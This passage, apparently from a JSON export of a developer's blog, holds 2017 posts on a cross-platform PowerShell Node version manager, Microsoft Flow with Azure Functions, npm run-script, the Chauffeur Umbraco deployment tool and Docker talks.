Chauffeur getting more love.
Expect to see more on Chauffeur this year, I’ve been working on some nifty stuff with it for the upcoming Umbraco Down Under Festival.\nAnd that’s pretty much a wrap for another 12 months!\n", "id": "2018-01-11-2017-a-year-in-review" }, { "title": "PowerShell nvm v2", "url": "https://www.aaron-powell.com/posts/2017-12-07-powershell-nvm-v2/", "date": "Fri, 08 Dec 2017 15:19:23 +1100", "tags": [ "node.js", "powershell" ], "description": "Introducing PowerShell nvm v2, a cross-platform Node.js version manager", "content": "🎉 TL;DR PowerShell Node Version Manager is 2.0 with semver support, autocomplete and it works on Windows, OSX and Linux PowerShell releases! 🎉\nA little over 3 years ago I was annoyed that I couldn’t easily run multiple versions of Node.js on Windows and that meant I could either install the stable version my project needed or install a bleeding edge version, I couldn’t easily do both. I knew that Linux/OSX had nvm but I was on Windows and short of using Cygwin shudders I didn’t have any options. So I set about writing a PowerShell script to help me out (not a batch script, it’s 2014 not 1990), which I then turned into a PowerShell module.\nOver the years I added to it as I needed new things, like adding io.js support, back in the days of the great Node.js stagnation, added distribution via the PowerShell Gallery and added an alternative install location to $PSScriptRoot to deal with long paths.\nThen a few months ago Felix Becker created an issue Error on macOS, about the fact that the module didn’t work on PowerShell on OSX. Well, ok then, I’d never actually tried it on OSX (I don’t have a current mac), so I left it to Felix to send a PR if he wanted to try and fix it.\nAnd this started a flurry of work on ps-nvm! While the OSX shipped in the 1.5.1 release it was a little flaky, but it worked, Felix raised a bunch more things that would be great to get in there like tests, support for the package.json engines value, semver install support (being able to install with >7.0.0) and proper CI/CD.\nTesting I got cracking on writing tests with Pester, where I introduced a combination of unit and integration tests that look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 It "Gets known versions" { $tmpDir = [system.io.path]::GetTempPath() Mock Get-NodeInstallLocation { Join-Path $tmpDir '.nvm\\settings.json' } Mock Test-Path { return $true } Mock Get-ChildItem { $ret = @() $ret += @{ Name = 'v8.9.0' } $ret += @{ Name = 'v9.0.0' } return $ret } $versions = Get-NodeVersions $versions.Count | Should -Be 2 $versions | Should -Be @('v9.0.0'; 'v8.9.0') } This generates a mock of a couple of PowerShell commands (so we don’t actually hit the disk) to check that we get a couple of versions found. All the tests can be found in nvm.tests.ps1.\nDoing this though I learnt a couple of things with Pester for cross-platform testing. When running on non-Windows platforms we had a bunch of problems with the temp directory that Pester creates so instead we just used [System.IO.Path]::GetTempPath() and managed it ourselves. Also the way the mock directory is cleaned is a bit of a pain so you have to do a bunch of stuff with the before/after test run functions.\nBut we got it all up and running, we have CI so that we can check across Windows, OSX and Linux. 
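If you’re curious what that temp directory handling looks like in practice, here’s a minimal sketch of the pattern (the test itself is made up, it just shows the shape of the setup/teardown, not the actual ps-nvm tests):
Describe "Cross-platform temp directory handling" {
    BeforeAll {
        # Manage our own temp directory via GetTempPath() rather than relying on Pester's TestDrive
        $script:tmpDir = Join-Path ([System.IO.Path]::GetTempPath()) 'nvm-tests'
        New-Item -ItemType Directory -Path $script:tmpDir -Force | Out-Null
    }
    AfterAll {
        # Clean up after ourselves since we bypassed Pester's own cleanup
        Remove-Item $script:tmpDir -Recurse -Force -ErrorAction SilentlyContinue
    }
    It "Writes a settings file" {
        $settings = Join-Path $script:tmpDir 'settings.json'
        '{}' | Set-Content $settings
        Test-Path $settings | Should -Be $true
    }
}
Nothing clever, but it behaves the same on Windows, OSX and Linux.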
We also now do code coverage reporting (and have 89% coverage at the time of 2.0.0)!\nGoing cross-platform So this all started with Felix kicked all of this off wanting OSX support, but once that was in there it got me thinking about why I don’t also expand it to cover Linux. The hard yards were done getting xplat working, so just a bit of a push to have the branch for Linux support would be easy.\nWell the first thing you need to do is reliably work out what OS you’re on, and, well, that’s a bit more of a pain. Normally I’d just do $env:OS and check that, but unfortunately in PowerShell Core (the xplat release) that doesn’t exist!\nBut, if you’re on PowerShell core you get 3 global variables introduced, $IsLinux, $IsMacOs and $IsWindows. Great, we can use that… oh but now I have a Windows issue, you would have to be using PowerShell Core, but that’s in preview, so people are unlikely to want that as their primary PowerShell version.\nAlso, if you’re running in strict PowerShell mode like I do when you try and access a global variable that hasn’t been defined your script will error out.\nNow we’re back to the drawing board, I need to:\nCheck which OS you’re on in a cross platform, cross PowerShell version way Can’t rely on magic global variables without relaxing my rules A bit of googling around told me that you can exploit Test-Path to check if variables are defined but doing Test-Path variable:global:variable-name, so that lead me to create some helper functions:\n1 2 3 4 5 6 7 function IsMac() { return (Test-Path variable:global:IsMacOS) -and $IsMacOS } function IsLinux() { return (Test-Path variable:global:IsLinux) -and $IsLinux } That’s great for PowerShell Core, but what about PowerShell 5? Well here we have to be a little trickier and use the $PSVersionTable as well:\n1 2 3 4 5 6 7 8 9 function IsWindows() { if ($PSVersionTable.PSVersion.Major -lt 6) { # PowerShell less than v6 didn't work on anything other than Windows # This means we can shortcut out here return $true; } return (Test-Path variable:global:IsWindows) -and $IsWindows } Now within our module we can do if (IsMac) { ... simply!\nSo a bit of branching logic with that and we can download a Linux package as well, then unpack the tar file and you’re good to go!\nSemVer support This is a pretty cool feature and something that I’d seen some requests for in the past. Basically you might want to depend on a range of node.js versions and now nvm can install from that range for you:\nPS> Install-NodeVersion '>=5.0.0 <7.0.0' With this nvm will work out what is the highest available Node.js version that you can install, and install it. SemVer also works for the Set-NodeVersion so if you have lots of local installs you can get the best fit for your current use case.\nTo achieve this we decided against writing it from scratch in PowerShell but instead depending on a NuGet package called SemanticVersioning which allows you to generate ranges and test versions within ranges.\nBecause I don’t like committing binary files to source control we then had to find a way to get that package installed and loaded into the PowerShell host. All in a xplat way! Well thanks to netstandard 2.0 that should be easy right? Yeah… nah. Due to a bug in .NET we have to have a hard dependency on .NET 4.7.1 (or you have to do a bunch of futzing with .NET locally).\nYou will need to have .NET Core 2.0 installed and .NET 4.7.1 for the easiest usage. 
That is our supported scenario.\nAutocomplete This is something I’m really excited about, you now get tab completion of the installed versions of Node.js on your machine when you use Set-NodeVersion and Remove-NodeVersion:\nI don’t quite get how it all works, other than you override some magic functions in PowerShell, but you can see its implementation here. What I find fun is that it’s circular, the autocomplete actually uses nvm to do its own autocomplete!\nThat’s a wrap This has been a lot of fun, I will admit that it’s probably the most complex process behind a PowerShell module that you’ll come across, 3 separate builds, 3 OSes, lots of test coverage, etc. but as a result of that I’ve learnt quite a lot more about how to approach well-designed PowerShell, maintainable PowerShell, how you can do testing, verification, multiple version support and a bunch of stuff like that.\nI hope the code can act as a reference point for others to learn about how to do this as well.\nNow go out and install v2!\n", "id": "2017-12-07-powershell-nvm-v2" }, { "title": "Simple APIs With Microsoft Flow And Azure Functions", "url": "https://www.aaron-powell.com/posts/2017-11-17-simple-apis-with-flow-and-azure-functions/", "date": "Fri, 17 Nov 2017 10:04:08 +1100", "tags": [ "flow", "serverless", "azure-functions" ], "description": "How to use Microsoft Flow and Azure Functions to create simple demo APIs", "content": "When I’m working on demos for a blog post/talk/OSS project/etc. I will tend to just create an ASP.NET Core app or Node.js app and throw it somewhere for hosting. But it’s always a little tedious, no matter how many times I do it, it requires me to dig up my old boilerplate code and then put it somewhere.\nRecently I wanted to create a PoC with some data persistence; I don’t really care how I persist the data, it just needs persisting. Standing up an Azure SQL instance was overkill, it’s a PoC so I’m likely to have a dozen records in it. Ok, well I guess I can just write it to a file on disk, but that’s not really great on an AppService, the next deployment will just kill it, so I thought why not use an Azure Table.\nWell that’s easy enough, but there’s a bunch of code I’d need to write to get it all working when really I just want to send some values and store them to be retrieved from another API call.\nWell this is really a lot of work for something that is a very minor part of the problem I’m trying to solve, and I feel like there’s a bunch of shorn yaks in my future…\nEnter Microsoft Flow I’ve been playing with Microsoft Flow for a while, it’s a nice way to do automation, it’s similar to IFTTT but integrates nicely with O365 and other MS services. One of the Flow Connectors that I like is the HTTP connector, which creates an HTTP endpoint that you can use to invoke your Flow!\nSo this sounds like a neat starting point, doesn’t it? I can create a Flow that is an HTTP endpoint and then there’s an Azure Table Storage connector that can write to or read from Table Storage.\nWell then, this looks nice and easy doesn’t it!\nBut there are a few downsides to using Flow as an HTTP endpoint, one is the URL that’s generated, it looks something like this:\nhttps://prod-21.australiasoutheast.logic.azure.com/workflows/77d8f1dfb5304131918db56d667b6bd8/triggers/manual/paths/invoke/api/task?api-version=2016-06-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=HRN8KhwMbox9fbsGXJRG9y-As4VQkMilRgMe2NbqQ2A Yeah, that’s not a particularly simple URL to use.
The other problem is that if you’re building anything CRUD you’re going to have a bunch of different URLs that you have to use, as each Flow will have a unique URL (sure, you could get around this by having the Flow accept many different HTTP methods and then branch internally based on what it was, but that would make the Flow complex).\nEnter Azure Function Proxies Azure Functions is Microsoft’s entry in the serverless space and it has a neat feature called Function Proxies.\nFunction Proxies are exactly what they sound like, a proxy to another endpoint (or you can use it to mock an endpoint). Now you can probably see where I’m going with this, using a proxy to wrap the Flow URL!\nThis now gives me a nice friendly URL from the Azure Function, I can define a route template (eg: /api/tasks) to hang off the hostname I get from Azure Functions.\nNow I’m able to hide my Flow URLs behind something that’s easy to consume from my application, and if my PoC were to become a real application I could just swap out the Flow URL in the Proxies to point at either another AppService or at Azure Functions.\nConclusion It’s pretty easy to create an Azure Function Proxy that will wrap around your ugly URLs for testing. I used Flow for this but you could also use Logic Apps, which are the same infrastructure as Flow but they are part of the Azure Portal (rather than a separate service) and have easier integration with a CI/CD pipeline, or the Azure CLI.\n", "id": "2017-11-17-simple-apis-with-flow-and-azure-functions" }, { "title": "Debugging PowerShell from VS Code on Linux using Docker containers", "url": "https://www.aaron-powell.com/posts/2017-11-13-debugging-powershell-from-vscode-on-linux/", "date": "Mon, 13 Nov 2017 17:08:45 +1100", "tags": [ "linux", "docker" ], "description": "A valid(?) use case for using a Docker Linux container to run a GUI application on Windows", "content": "I’ve previously blogged about running a Docker Linux container on Windows to run VS Code on Linux and at the time I was really just doing it because I wanted to work out if it was actually possible, which it was! But in reality it was really a solution just looking for a problem.\nWell, good news, I have found the problem that this is a valid solution for! Well, as valid a solution as I can come up with at least.\nOne of my pet projects is a PowerShell module for managing different Node.js versions, called nvm. This little module has been floating around for a few years now, I add things to it whenever I find a problem, or someone reports one.\nThe other month someone raised an issue, the module didn’t work on OSX. Well I wasn’t surprised, I’d never tried it on OSX but Felix was willing to give it a go. After a bit of back and forth it was all up and running. We then worked on a few other steps that saw automated tests written and CI set up on AppVeyor and Travis-CI.\nAnd then what’s next, well adding Linux support of course! It’s being tracked here. There was a problem though, an error was reported when running the tests, an odd error about version numbers.
I figured that the error was coming something in the test framework but I don’t know where so I needed to do some investigation.\nBut how do you do that when a) PowerShell is running on Linux and b) I don’t run Linux?\nDocker!\nSo I know you can run PowerShell in a Linux container and I previously proved I could run VS Code on a Linux container with X11 forwarding to Windows, so why don’t we combine them, install the PowerShell VS Code extension and debug the tests! It beats trying to work out how to setup remote debugging.\nIt was just a matter of taking Jessie’s VS Code Dockerfile, changing the FROM to be from microsoft/powershell and then you’re good to go!\nAww yeah! 😀\nFor the record I did find the cause of the bug, it was a type conversion issue due to the order of precedence in PowerShell equality tests within Pester, as reported here. Good to know JavaScript isn’t the only one with type conversion issues 😛\n", "id": "2017-11-13-debugging-powershell-from-vscode-on-linux" }, { "title": "Avoiding npm globals through run-script", "url": "https://www.aaron-powell.com/posts/2017-11-12-avoiding-npm-globals-through-run-scripts/", "date": "Sun, 12 Nov 2017 14:55:46 +1100", "tags": [ "nodejs", "npm" ], "description": "How to remove your reliance on globally installed node tools", "content": "I was talking with Richard Banks the other day about doing silly things with Docker (because, well I’m known for that at work) and he was saying he wants to create docker containers that contain the global npm modules that he often uses to save installing them using npm install -g.\nI asked him why he was using npm install -g and he said it was for build tools (gulp/grunt/webpack/etc.) so that you can easily run them.\nThis led me to show him how I use globals without relying on global installs.\nInstalling node cli tools When you use npm install -g it really doesn’t do anything different other than instead of putting the module in your $PWD/node_modules it puts them in the path that node.js is installed to, which (assuming you installed it correctly, or used nvm) will be in your $env:PATH (or other OS equivalent), thus making the command globally available. If you drop the -g then you still get the executable, but it’s in $PWD/node_modules/.bin.\nThis means that your local install can still be used, it’s just a pain to type the path every time before you run it.\nSo realistically you probably do want to be doing a local install because by doing so you have it added to your package.json and that makes it clear that you depend on webpack. It also means that you can state the version you depend on. By relying on globals you have to deal with the problem of what happens if you require webpack@3 but another project you work on is using webpack@1? Well one of them has a broken dependency if you use the global install, and thus it may not work properly.\nIntroducing npm run-script Our main pain point is with the additional path that has to be typed to get to our local installed version, so how do we get around this? Conveniently npm has something we can leverage run-script which allows you to define a command that can be executed, so we can now do this:\n$> npm run webpack To do this you need to add a scripts section to your package.json like so:\n... "scripts": {"webpack": "webpack"} ... But wait, how does it know which version of webpack to run? Isn’t that just looking for a global command?\nActually, no. 
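You can see the directory npm is going to look in by asking it directly (the path below is just an illustration of what it prints for a typical project, not a real one):
PS> npm bin
C:\dev\my-app\node_modules\.bin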
When a run-script is executed npm will append the npm bin path to the PATH of the script’s environment, and thus it finds your locally installed dependency.\nToo easy! 😀\nUpdate It seems that this isn’t the only way to do it:\nAlso see https://t.co/4EPsb0ZbUH, which is installed with npm by default\n— Tim Oxley (@timkevinoxley) November 12, 2017 Thanks Tim, TIL!\n", "id": "2017-11-12-avoiding-npm-globals-through-run-scripts" }, { "title": "Hit Refresh", "url": "https://www.aaron-powell.com/posts/2017-10-31-hit-refresh/", "date": "Tue, 31 Oct 2017 21:10:44 +1100", "tags": [ "career" ], "description": "My story of when I ‘Hit Refresh’ on my career.", "content": "I’ve started having a read of Hit Refresh and it got me pondering my own story.\nLike all good stories this one starts with heartache, I’d just gotten out of a long-term relationship and I was looking for an escape. Drugs, alcohol, none of those appealed, instead I escaped into the world of open source software.\nWell this was 2009 and I was a .NET developer and open source was not really a thing in the .NET community, after all .NET Core was 6 years away and there was no NuGet.\nI got involved in the Umbraco community, Umbraco being a .NET CMS that we used at work and one of the few OSS projects that I was aware of. I had dabbled a bit with it before, had published my own OSS library for use with Umbraco, but this time I decided to get more involved.\nThrough this involvement I got invited to be a contributor to the project and was invited to their annual conference in Copenhagen. I’d never been to a user group or conference in Australia, let alone an international conference, but I couldn’t pass up the opportunity. So I organised my leave from work, booked my flight, prepared to deal with the anxiety of going so far out of my comfort zone and headed over.\nBut I had a secret objective, to find a new job. I was still a bit raw (it’d only been a few months) and I thought “hey, I could work in Europe for a few years”. Well I did meet someone over there, they happened to be the only other Australian, who hailed from a company in Sydney.\nA few weeks after returning from Copenhagen I was packing my apartment up and moving to Sydney!\nNow though I was bitten by the community bug, I’d had such a blast getting into OSS and attending a conference that I started getting into the Australian dev community. I started following people in Sydney on twitter (many of whom are now close friends) and saw them talking about an upcoming Australian conference called DDD Melbourne. One night after a few glasses of liquid courage I decided to submit, I’d seen people present and was sure I could do it too.\nAfter a couple of weeks, I got an email saying I’d been accepted to speak, then I’m on stage in front of a bunch of people and meeting all these people I looked up to in the Australian dev community!\nAnd I was hooked. I started attending, then speaking at User Groups, then bigger conferences like TechEd, and eventually running DDD Sydney. This got me on the radar of Readify, I was encouraged to join (where I’ve been for 7 years now) and it eventually led to me being awarded my first Microsoft MVP award.\nLooking back it’s all very surreal, what started as a whim decision to head to an event on the other side of the world opened up a whole new world for me.
I was nervous getting on that first plane, I was nervous writing that first abstract and nervous presenting my first talk, but I’d do it all again.\n", "id": "2017-10-31-hit-refresh" }, { "title": "Chauffeur v0.12.0", "url": "https://www.aaron-powell.com/posts/2017-10-26-chauffeur-v012/", "date": "Thu, 26 Oct 2017 14:54:45 +1100", "tags": [ "umbraco", "chauffeur" ], "description": "What's new in the latest Chauffeur release?", "content": "Chauffeur, my little Umbraco deployment tool is chugging along quite nicely. I don’t do a huge amount of work on it, mostly it comes in batches when I get requests from people who are using it. For the release I’ve just cut, v0.12.0, I’ve got quite a lot of changes in it so I wanted to do a bit more of a write up about them.\nSide note: I cut v0.12.1 almost straight away because I realised the NuGet logo was broken 😛.\nThe Chauffeur Scaffolder I believe this is the killer new feature of Chauffeur!\nOne of the hardest parts of using deployment tools is how to incorporate them into your existing project, and Chauffeur is no exception. Whether your project is something you’ve worked on for hours or worked on for months, the “Getting Started” is always a pain.\nWhile on the train home last night I pondered this. I started by thinking “What does a Getting Started guide look like?” and I mapped out the steps:\nInstall the NuGet packages Create your first delivery file Add the setup steps Export your Umbraco structure to a package, which means you have to create a package Create a delivery step to import that Well that requires a bunch of manual steps, and the “create package -> setup” step is one that’s really annoying to do (speaking from experience here!) so I started to think on how I could automate that. I’d been toying with the idea of a create-package Deliverable for a while now and this seemed like a logical intersection, I have some of the insights on that, why don’t I plug it in there.\nSo I quickly whipped up a GitHub issue and got cracking on the code. My ideal workflow is that you could do:\nInstall NuGet package chauffeur scaffold Profit The new scaffolder will ask 3 questions, the name for the initial delivery, whether you want the install steps (install y and user change-password) and if you want a package generated of your site structure items (DocTypes, DataTypes, etc. excluding content).\nOnce done it’ll run and you’re ready to check everything and start collaborating!\nDocument Type Improvements One of our clients here at Readify is using it on a new project and I was talking to the team on how they are using it and any pointy edges. Their biggest issue turned out to be something that I didn’t even realise was a bug and that is when you import a Content Type (aka Document Type) with a property change it doesn’t get reflected. I found it odd that no one had told me this previously so I did some investigation and found that there’s a problem that I logged on GitHub to track.\nThe crux, it turns out, is that the Umbraco import engine is designed to be a lot more non-destructive than I realised, and it doesn’t update properties, only adds new ones!\nWell good news, in Chauffeur v0.12 this is fixed, I’ve created a bit of an extension over the importer to ensure that we handle that properly inside Chauffeur (and I created a regression test to cover it).\nDelete operations From here I started exploring more of the possible problems that could come up and one that I knew of but never had thought to deal with was removing of Content Types. 
Now there’s nothing in the Umbraco package engine (which I mostly rely on) that does this, after all, how do you import a delete? so I decided that the easiest way would be to extend the existing content-type deliverable with a remove feature command. Now you can do:\n1 umbraco> content-type remove <alias> Another piece of feedback the team gave me was they’d like a way to remove a property, so I have added that too:\n1 umbraco> content-type remove-property <alias> <property alias> Delivery comments This is a small task that’s just been hanging out in my backlog, I wanted to have a way that you could add comments to a delivery file. A line comment is denoted by ## so you can do something like this:\n1 2 3 4 ## Create the Umbraco database install y ## Set the admin password to something super secret user change-password admin passwordpassword Again, it’s the small things that are nice.\nOutput formatting Another thing that’s always annoyed me is how sloppy the output looked when you used content-type get-all (or get <alias>), and this was because, well, output formatting isn’t that easy when you’re using Console.Out. But I decided it was time to get it cleaned up and make a pretty table that has everything lined up. With this change we go from this:\nId Alias Name Parent Id 1067 demo Demo -1 Property Types Id Name Alias Mandatory Property Editor Alias 73 someProperty Some Property False Umbraco.TextboxMultiple To this:\nId | Alias | Name | Parent Id 1067 | demo | Demo | -1 Property Types Id | Name | Alias | Mandatory | Property Editor Alias 73 | Some Property | someProperty | No | Umbraco.TextboxMultiple That looks much better.\nLogo! I’m starting to think about going “v1” with Chauffeur, it’s only been about 3 years since I cut the first lines of code for it, so it’s probably time. So that means I want to put a bit more polish on things and one of the things in doing that is I wanted a logo.\nWell, I found one, I’ve grabbed an image from The Noun Project which is available from Ed Piel and used under Creative Commons from The Noun Project.\nSo everyone, install Chauffeur v0.12 and get deploying!\n", "id": "2017-10-26-chauffeur-v012" }, { "title": "Using Flow to monitor Have I Been Pwned", "url": "https://www.aaron-powell.com/posts/2017-10-09-flow-hibp-todo/", "date": "Mon, 09 Oct 2017 18:30:44 +1100", "tags": [ "flow", "automation" ], "description": "How I'm using Microsoft Flow with HIBP to notify me of breaches", "content": "I, like many people, use Troy Hunt’s Have I Been Pwned to notify me when my account was in a data breach.\nWhile the email notification is fine it doesn’t really fit into my workflow and honestly I get that much email it’s just another thing that is picked up by Clutter and filtered out of my inbox. Because of this it’s often days before I even find out I was in a breach, not really ideal.\nBecause of the amount of email that flows through my inbox I’m constantly trying to work out what’s the best way for me to bubble up the actions I need to take and then track them, as opposed to the stuff that I’ll read eventually (ok, never). I’ve played around with a couple of different ways to do this and at the moment I’m giving Microsoft Todo a crack. In Todo I have all the opportunities I’m tracking as part of my Technical Pre-Sales role as well as a bunch of personal things I need to follow up on. 
So this sounds like an ideal place to put my “change password cuz you were in a breach” task.\nEnter Microsoft Flow When I want to do simple automation I crack out Microsoft Flow which is a great tool to monitor a bunch of different kinds of inputs and then perform actions when triggered. So I set about a plan to combine Flow and HIBP, I wanted to:\nHave a new breach trigger a Flow If I’m in the breach pop an item in my todo list ??? Profit Creating our Flow Right, so the first thing I need to do is be notified of a breach. Now you could do this with an Email connector in Flow and look for incoming emails from HIBP but that’s a bit risky, do you fuzzy match the subject? look for a from address? hope that it’s landing in your inbox (which mine doesn’t)?\nOr do you go simple and subscribe to the RSS feed?\nI’ve chosen to go for an RSS approach in Flow, it’s really simple and does exactly what I want. Only downside, it’ll trigger on every breach, not just when I’m in it.\nAm I pwned? So we’re being notified of a breach, now to work out if I was in said breach. Again Troy has made this pretty easy for me because he has an API for HIBP that is not only free, but really simple to use.\nI’m going to need to make 2 API calls, the first one is to get the breach details, from which I’ll need the domain so I can pass it across to the breaches for account API call (I have the Parse JSON Flow step between these so I can get the values out of the response). This will return a 200 OK if I was in the breach or a 404 Not Found if I wasn’t.\nRaising a Notification With that the basic structure of our Flow is done, we’re able to perform some kind of notification when you were in a breach, you could do a Push notification or send an email (😛), or as I want to do, push something across to Microsoft Todo!\nGetting Started with Outlook Tasks Unfortunately, at the time of writing, Microsoft Todo doesn’t have a Connector in Flow, so instead you’ve got to do this all yourself. Thankfully there’s a detailed API for Microsoft Todo, which just happens to be Outlook Tasks under the hood.\nThe simplest approach to this is to just use the HTTP Action and you’re set to go… almost. There is one tricky thing to deal with still, authentication. You see, you need to provide an Authorization header to the Outlook API so you can work with it… kind of makes sense.\nAgain the simplest approach would be to use something like Postman to generate a token for you, but that token will only last for a short period of time, so chances are you’ll need to generate a new one for each breach.\nInstead I’ve created a custom Connector in which I can define my Authentication type (OAuth2.0 in this case) and set the appropriate details for my Office Application, and then you’re good to define the Flow Actions against the Outlook Tasks API.
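Under the hood the custom action is just an authenticated POST to the tasks endpoint. To give a sense of the shape of the call, here’s a rough sketch from memory (the endpoint, property names and the $token placeholder are my recollection of the Outlook Tasks API, not a copy of the connector definition):
# Build the task payload; subject and dates are illustrative values
$body = @{
    Subject     = 'Update password for example.com'
    DueDateTime = @{ DateTime = '2017-10-10T00:00:00'; TimeZone = 'AUS Eastern Standard Time' }
} | ConvertTo-Json

# POST it with whatever bearer token the OAuth2.0 flow handed back
Invoke-RestMethod -Method Post -Uri 'https://outlook.office.com/api/v2.0/me/tasks' -Headers @{ Authorization = "Bearer $token" } -ContentType 'application/json' -Body $body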
I’ve created one that wraps around the Create Task API, defined some default parameter values on the body (because don’t want to type the date time local each time) and now you’re good to go!\nBringing it all together Here’s how the flow looks:\nThe values I’ve set for the Todo item that’s created are:\nSubject of Update password for <domain> Start Date of <added date> Due date of <added date + 1 day> And there we have it, you’re good to go!\nConclusion Well it was really simple for us to introduce a Flow that will track breaches in HIBP and if you’re in it perform some kind of action, in my case create a task in Outlook Tasks using a custom Flow Connector.\nIf you’re interested to have a play with it I’ve exported the Connector:\nAnd the Flow itself (although you’ll need to re-map the Connector once uploaded), make sure you set your email address in the step where we call HIBP’s API:\nHappy automating.\n", "id": "2017-10-09-flow-hibp-todo" }, { "title": "Edge On iOS And Android", "url": "https://www.aaron-powell.com/posts/2017-10-06-edge-on-ios-and-android/", "date": "Thu, 05 Oct 2017 20:14:02 +1100", "tags": [ "ms-edge" ], "description": "Microsoft Edge on iOS and Android, what does it mean?", "content": "If you missed the tech news this morning Microsoft announced that the Edge browser is coming to iOS and Android. This, on the surface, seems like quite an unexpected move but digging deeper it isn’t that unexpected.\nSo with it announced I want to talk about about what it is, why I’ll be installing it for a play but don’t know if I’d move to it as my primary browser on my Pixel.\nEdge but not Edge As an MVP something that I’ve been asked more times than I can remember is “When is Edge coming to …” and my answer to this is always “don’t bank on it”. Does that mean that I’m now eating my words?\nNo.\nWhen you think about a browser there are really three core pieces that come together to make it work, the browser UI, the JavaScript engine and the Layout engine. In Edge this is a UWP (that as best as I know doesn’t have a name of its own), Chakra (extensions on top of ChakraCore) and EdgeHTML (a slimmed down version of Trident).\nAnother thing that you need to understand is the restrictions on the mobile platforms, particularly iOS. With iOS you’re unable to have a default browser other than Safari, nor can you run an application that does its own JIT. If you look at Chrome or Firefox for iOS they both sit on top of the WebView, rather than using Blink or Gecko as the rendering engine.\nAndroid is less restrictive, you can run your own layout engine, which Firefox for Android does. Edge though relies on the Chrome engine, similar to how the Samsung browser works.\nSo where does this leave Edge, if it’s not using the same layout engine or JavaScript engine? The UI and associated systems.\nNot so unexpected If you’ve been following what Microsoft has been doing over the last few years you’ll have seen their push into a platform agnostic software provider, with Office across iOS and Android, Cortana appearing on mobile and partnering with Amazon on Alexa, .NET going cross platform and so on.\nSo an integrated Edge experience, syncing your browsing across multiple platforms (like Chrome or Firefox, and to a lesser extend Safari) makes sense, it’s all about data. 
You see, by tracking what you’re doing on the web across all your devices, not just one, companies can produce a more complete profile of you as a web user and that feeds into… well, I try not to think about what they know about me and what they can do with that 😛!\nThe browsing experience What does this all mean for a user browsing the web? Well, it means that the version of Edge you’re using on iOS or Android will have a different layout engine to the desktop version. This means that you might have different features, making UA sniffing even less viable and it’s yet another justification for feature detection.\nConclusion Unsurprisingly there’s been a bunch of internet trolling on this already, “why don’t you just use Blink on desktop” (which I’ve blogged about before), “fix/add/remove feature X” (maybe vote for it), etc. but it’s pretty par for the course these days.\nEdge on iOS and Android isn’t meant to be for everyone, it’s targeted at people who are already using Edge as their primary browser and want to have their favorites, reading list, passwords, etc. roaming across multiple devices.\n", "id": "2017-10-06-edge-on-ios-and-android" }, { "title": "What's New On The Web Platform", "url": "https://www.aaron-powell.com/posts/2017-10-02-whats-new-on-the-web-platform/", "date": "Mon, 02 Oct 2017 14:18:29 +1100", "tags": [ "web", "speaking" ], "description": "Some new features in the web platform from the MS Edge Web Summit", "content": "I recently blogged about my experience at MS Edge Web Summit. On the back of this I was invited to speak at ALT.NET Sydney to share some of the things I’d learnt about. I covered off three topics, the Payment Request API, Sonar and some new features in F12.\nFor the Payment Request API I created some demos:\nA basic demo A demo using multiple payment methods Requesting shipping address Dynamic shipping options “Lazy loading” shipping options Note: These demos are purely client side and don’t submit card details or anything, you can see the code for each page by following the commit link in their footers.\nIf you want to learn what the Payment Request API is about check out this article.\nI also covered off Sonar, which is a linting tool that’s great for ensuring your website is running as well as it can (yep, I haven’t got it integrated into my blog yet, one day 😛).\nThe final topic was what’s new in F12 for Edge 16, but I was really pressed for time by then, so you’ll get more out of Jacob Rossi’s MS Edge Web Summit talk.\nIf you want to watch my talk it’s up on YouTube.\n", "id": "2017-10-02-what's-new-on-the-web-platform" }, { "title": "Docker, FROM scratch", "url": "https://www.aaron-powell.com/posts/2017-10-01-docker-from-scratch/", "date": "Sun, 01 Oct 2017 18:38:36 +1000", "tags": [ "docker", "conference", "ndc", "speaking" ], "description": "Learning Docker by starting at the basics and working our way up", "content": "A perk of working at Readify is that we strive to be leaders in technology so we’re always encouraged to learn new things. One such thing that I started getting into a year or so ago was Docker.
Now I’m not an infrastructure person, I left that part of IT a long time ago, so what I was interested in Docker for was how it can be used in a development experience and how it fits there before even beginning to look at running a containerised production environment.\nSo as a consultant (well, former consultant) I would often spend time coaching people around what Docker is and where to get started and what I realised was that too often those of us who’ve been working on a technology for a while forget that there’s a lot of people who haven’t started that journey yet. There’s a long way from running Kubenetes clusters in production when you’ve not yet created your first container.\nDocker, FROM scratch At NDC Sydney this year I presented a new talk I’ve been working on in this space called Docker, FROM scratch. You can watch the talk here:\nIn this talk I walk through a getting started guide to Docker, we start at the basic “Hello World” style example of running an Ubuntu container and dropping into a shell, then we go all the way through to running a multi-container architecture with multiple networks. I do this by walking through a git repository which you can find here (and there is a walk through of each step too).\nI quite enjoy giving this talk so I hope you find this a useful introduction to Docker so you can get started on your journey.\n", "id": "2017-10-01-docker-from-scratch" }, { "title": "Readify PC 12 Months On", "url": "https://www.aaron-powell.com/posts/2017-09-27-readify-pc-12-months-on/", "date": "Wed, 27 Sep 2017 10:11:55 -0700", "tags": [ "readify", "career" ], "description": "A look back at the last 12 months of being a Readify PC", "content": "Around 12 months ago I wrote a blog post about my journey from SD to PC at Readify and I thought it might be worthwhile doing a follow up to that about how the 12 months since then have gone. If you haven’t read the first one you might want to read it, it’ll give a bunch of context into what I’m talking about here.\nWhat’s Changed? As much as I’d like to say that moving into the PC role I was able to answer every question, solve every problem, etc. but unsurprisingly no, that wasn’t the case. Realistically nothing really changed, at least not immediately, as I was really doing most of the PC roles during the ~6 months prior. I also happened to be in the middle of quite a large project so that was the main focus.\nBut as that project got into a more solid place my involvement was less required and I was able to move into more non-billable work. What do I mean by that? as a PC you will spend a portion of your week not directly on a client but instead focusing on a number of other Readify activities, from doing health checks with other teams, helping fellow consultants on their career path, or pre-sales activities.\nGrowing into the PC role Being in the new role I was able to spend more time doing some stuff that I found I was really enjoying, and one such thing was pre-sales, going out to qualify an opportunity. This kind of work allows me to spread my technology breadth wider, look at more kinds of problems and how to solve them, as well as doing more technical writing.\nI also got an opportunity to get involved in a digital transformation project for a large multinational project. 
